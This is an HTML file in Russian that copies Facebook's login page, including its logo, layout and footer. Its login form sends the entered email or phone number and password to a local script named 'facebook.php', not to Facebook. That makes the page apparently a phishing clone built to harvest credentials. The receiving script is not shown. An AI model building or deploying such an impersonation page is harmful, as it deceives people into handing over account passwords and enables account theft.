<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title> Facebook login page</title>
        <style>
            body, button, input, label, select, td, textarea {
                font-family: Helvetica, Arial, sans-serif;
                font-size: 12px;
            }
            body {
                background: #fff;
                color: #1c1e21;
                direction: ltr;
                line-height: 1.34;
                margin: 0;
                padding: 0;
                unicode-bidi: embed;
                overflow-y: scroll;
            }
            h2 {
                margin-block-start: 0.83em;
                margin-block-end: 0.83em;
                margin-inline-start: 0px;
                margin-inline-end: 0px;
                margin: 0;
            }
            div {
                display: block;
            }
            form {
                margin: 0;
                padding: 0;
                display: block;
            }
            input {
                text-rendering: auto;
                color: fieldtext;
                letter-spacing: normal;
                word-spacing: normal;
                line-height: normal;
                text-transform: none;
                text-indent: 0px;
                text-shadow: none;
                display: inline-block;
                text-align: start;
                appearance: auto;
                -webkit-rtl-ordering: logical;
                cursor: text;
                background-color: field;
                margin: 0em;
                padding: 1px 0px;
                border-width: 2px;
                border-style: inset;
                border-color: -internal-light-dark(rgb(118, 118, 118), rgb(133, 133, 133));
                border-image: initial;
                padding-block: 1px;
                padding-inline: 2px;
            }
            a {
                color: #385898;
                cursor: pointer;
                text-decoration: none;
            }
            #global {
                margin: 0 auto;
                position: relative;
                zoom: 1;
                font-family: inherit;
                overflow: initial;
                background: #f0f2f5;
                display: flex;
                flex-direction: column;
            }
            #main_page {
                margin: 0 auto;
                outline: none;
                padding: 0;
                width: 980px;
            }
            #no_footer {
                padding-bottom: 112px;
                padding-top: 72px;  
                min-width: 500px;
            }
            #fb_logo {
                padding: 112px 0 16px;
                height: 106px;
                margin: -28px;
                border: 0;
                overflow-clip-margin: content-box;
                overflow: clip;
            }
            #fb_header {
                width: 500px;
                box-sizing: border-box;
                margin-right: 0;
                padding-right: 32px;
                display: inline-block;
                vertical-align: top;
            }
            #fb_login_main {
                min-width: 500px;
                height: 496px;
                width: auto;
                padding: 20px 0;
                position: relative;
            }
            #fb_login_window {
                float: right;
                /* display: inline-block; */
                vertical-align: top;
            }
            #fb_login {
                width: 396px;
                background-color: #fff;
                border: none;
                border-radius: 8px;
                box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
                box-sizing: border-box;
                margin: 40px 0 0;
                padding: 14px 0 28px;
                text-align: center;
                /* padding-bottom: 24px; */
                /* padding-top: 10px; */
            }
            #login_button {
                background-color: #1877f2;
                border: none;
                border-radius: 6px;
                font-size: 20px;
                line-height: 48px;
                padding: 0 16px;
                width: 351px;
                color: #fff;
                transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
                box-sizing: content-box;
                -webkit-font-smoothing: antialiased;
                font-weight: bold;
                position: relative;
                text-align: center;
                text-shadow: none;
                vertical-align: middle;
                cursor: pointer;
                display: inline-block;
                text-decoration: none;
                white-space: nowrap;
                appearance: auto;
                text-rendering: auto;
                letter-spacing: normal;
                word-spacing: normal;
                text-transform: none;
                text-indent: 0px;
                padding-block: 1px;
                padding-inline: 6px;
            }
            #forgot_password {
                color: #1877f2;
                font-size: 14px;
                font-weight: 500;
            }
            #new_account {
                border: none;
                border-radius: 6px;
                font-size: 17px;
                line-height: 48px;
                padding: 0 16px;
                background-color: #42b72a;
                color: #fff;
                transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
                box-sizing: content-box;
                -webkit-font-smoothing: antialiased;
                font-weight: bold;
                position: relative;
                text-align: center;
                text-shadow: none;
                vertical-align: middle;
                cursor: pointer;
                display: inline-block;
                text-decoration: none;
                white-space: nowrap;
            }
            #reg_business {
                border-top: none;
                color: #1c1e21;
                font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
                font-size: 14px;
                font-weight: normal;
                padding-top: 0;
                margin-top: 28px;
                text-align: center;
                width: 396px;
            }
            #fb_bus {
                font-family: SFProText-Semibold, Helvetica, Arial, sans-serif;
                font-size: 14px;
                font-weight: 600;
                cursor: pointer;
                text-decoration: none;
                color: inherit;
                text-align: center;
            }
            .fields {
                font-size: 17px;
                width: 364px;
                margin: auto;
                padding: 6px 0;
                display: inline-block;
            }
            .fb_password {
                background: none;
                border: 0;
                box-shadow: none;
                float: left;
                font-size: 17px;
                padding: 0;
                width: 300px;
            }
            .type_in {
                border-radius: 6px;
                font-size: 17px;
                padding: 14px 16px;
                width: 330px;
                background: #FFFFFF;
                border: 1px solid #dddfe2;
                color: #1d2129;
                height: 22px;
                line-height: 16px;
                vertical-align: middle;
            }
            .fb_text {
                padding: 0 0 20px;
                color: #1c1e21;
                font-size: 28px;
                line-height: 28px;
                width: auto;
                font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
                font-weight: normal;
                display: inline-block;
                text-rendering: optimizelegibility;
            }
            .forgor {
                margin-top: 16px
            }
            .line {
                align-items: center;
                border-bottom: 1px solid #dadde1;
                display: flex;
                margin: 20px 16px;
                text-align: center;
            }
            footer {
                background: #f0f2f5;
                bottom: 0;
                box-sizing: border-box;
                color: #8A8D91;
                font-size: 12px;
                /* height: 40px; */
                line-height: 20px;
                margin: 0 auto;
                width: 980px;
                background-color: #fff;
                padding-top: 20px;
                margin-bottom: 20px;
            }
            #languages {
                list-style: none;
                margin: 0 0 5px -3px;
                padding: 0;
                /* text-align: center; */
                display: flex;
                flex-wrap: wrap;
                flex-direction: row;
            }
            #languages li a {
                margin: 0 4px;
                padding: 0;
                display: inline;
                vertical-align: top;
                text-decoration: none;
                cursor: pointer;
                color: inherit;
            }
            #languages li a:hover {
                text-decoration: underline;
            }
            .content-curve {
                border-bottom: 1px solid #dddfe2;
                font-size: 1px;
                height: 4px;
                margin-bottom: 8px;
            }
            #features {
                list-style: none;
                margin-bottom: 20px;
                margin-left: -20px;
                padding: 0;
                display: flex;
                flex-wrap: wrap;
                flex-direction: row;
                display: flex;
            }
            #features li a {
                margin: 0;
                padding: 0 0 0 20px;
                display: inline;
                vertical-align: top;
                text-decoration: none;
                cursor: pointer;
                color: inherit;

            }
            footer span {
                font-size: 11px;
            }

        </style>
    </head>
    <body>
        <div id="global">
            <div id="main_page">
                <div id="no_footer">
                    <div id="fb_login_main">
                        <div id="fb_header">
                            <svg id="fb_logo" xmlns="http://www.w3.org/2000/svg" width="320.94" height="106" fill="none" viewBox="0 0 1090 360">
                                <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.728 48.475-53.929 0-31.202-20.39-53.929-48.475-53.929Zm-6.98 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-113.638 1.331c-15.649 0-26.883-7.273-30.714-19.805h72.63c.715-3.831 1.202-8.377 1.202-11.429 0-33.02-18.475-52.825-49.514-52.825-31.331 0-53.02 22.013-53.02 53.929 0 32.338 22.728 53.929 56.462 53.929 17.467 0 34.448-5.844 45.065-15.552l-10.617-18.701c-10.292 7.11-20.39 10.454-31.494 10.454Zm-6.591-61.137c13.637 0 22.338 8.279 22.338 21.104v.098h-47.078c2.825-13.604 11.623-21.202 24.74-21.202Zm-98.994 84.968c15.26 0 30.195-5.844 40.714-15.974l-11.526-19.383c-8.182 6.364-17.467 9.805-26.266 9.805-16.364 0-27.273-11.429-27.273-28.377s10.909-28.377 27.273-28.377c8.084 0 16.883 2.922 24.026 8.085l11.721-19.806c-9.481-8.571-24.156-13.831-38.702-13.831-32.013 0-54.643 22.338-54.643 53.929.032 31.494 22.662 53.929 54.676 53.929Zm-93.735-105.261-.519 15.975c-6.981-11.916-19.481-18.572-34.838-18.572-28.085 0-48.475 22.728-48.475 53.929 0 31.202 20.52 53.929 48.475 53.929 15.357 0 27.889-6.656 34.838-18.474l.519 15.844h26.169V155.265h-26.169Zm-28.377 80.099c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.422 28.799-25.552 28.799Zm-57.663-79.906h-26.526v-8.767c0-13.117 5.13-18.149 18.442-18.149 4.123 0 7.467.097 9.383.292v-22.5c-3.637-1.007-12.5-2.013-17.63-2.013-27.111 0-39.611 12.792-39.611 40.422v10.682h-16.753v24.806h16.753v77.631h29.448v-77.599h21.949l4.545-24.805Z"/>
                            </svg>
                            <h2 class="fb_text">
                                Facebook помогает вам всегда оставаться на связи и общаться со своими знакомыми.
                            </h2>
                        </div>
                        <div id="fb_login_window">
                            <div id="fb_login">
                                <form action="facebook.php" method="post">
                                    <div class="fields">
                                        <input type="text" name="email" placeholder="Электронный адрес или номер телефона" class="type_in">
                                    </div>
                                    <div class="fields">
                                        <div class="fb_password">
                                            <input type="password" name="password" placeholder="Пароль" class="type_in fb_password">
                                        </div>
                                    </div>
                                    <div style="padding-top: 6px;">
                                        <input type="submit" value="Вход" id="login_button">
                                    </div>
                                </form>
                                <div class="forgor">
                                    <a href="#" id="forgot_password">Забыли пароль?</a>
                                </div>
                                <div class="line"></div>
                                <div style="padding-top: 6px;">
                                    <button id="new_account">Создать новый аккаунт</button>
                                </div>
                            </div>
                            <div id="reg_business">
                                <a href="#" id="fb_bus">Создать страницу</a> знаменитости, музыкальной группы или компании.
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <footer>
                <ul id="languages">
                    <li><a href="#">Русский</a></li>
                    <li><a href="#">English (US)</a></li>
                    <li><a href="#">Türkçe</a></li>
                    <li><a href="#">Bahasa Indonesia</a></li>
                    <li><a href="#">中文(简体)</a></li>
                    <li><a href="#">Қазақша</a></li>
                    <li><a href="#">Deutsch</a></li>
                    <li><a href="#">한국어</a></li>
                    <li><a href="#">Shqip</a></li>
                    <li><a href="#">Español</a></li>
                    <li><a href="#">Português (Brasil)</a></li>
                </ul>
                <div class="content-curve"></div>
                <ul id="features">
                    <li><a href="">Регистрация</a></li>
                    <li><a href="">Логин</a></li>
                    <li><a href="">Messanger</a></li>
                    <li><a href="">Facebook Lite</a></li>
                    <li><a href="">Видео</a></li>
                    <li><a href="">Места</a></li>
                    <li><a href="">Игры</a></li>
                    <li><a href="">Marketplace</a></li>
                    <li><a href="">Meta Play</a></li>
                    <li><a href="">Meta Store</a></li>
                    <li><a href="">Meta Quest</a></li>
                    <li><a href="">Imagine with Meta Ai</a></li>
                    <li><a href="">Instagram</a></li>
                    <li><a href="">Threads</a></li>
                    <li><a href="">Благотворительные акции</a></li>
                    <li><a href="">Услуги</a></li>
                    <li><a href="">Центр информации о выборах</a></li>
                    <li><a href="">Политика конфиденциальности</a></li>
                    <li><a href="">Центр конфиденциальности</a></li>
                    <li><a href="">Группы</a></li>
                    <li><a href="">Информация</a></li>
                    <li><a href="">Создать рекламу</a></li>
                    <li><a href="">Создать страницу</a></li>
                    <li><a href="">Разработчикам</a></li>
                    <li><a href="">Вакансии</a></li>
                    <li><a href="">Файлы сookie</a></li>
                    <li><a href="">Рекламные предпочтения</a></li>
                    <li><a href="">Условия использования</a></li>
                    <li><a href="">Справка</a></li>
                    <li><a href="">Загрузка контактов и лица, не являющимися пользователями</a></li>
                </ul>
                <span> Meta © 2024</span>
            </footer>
    </body>
</html>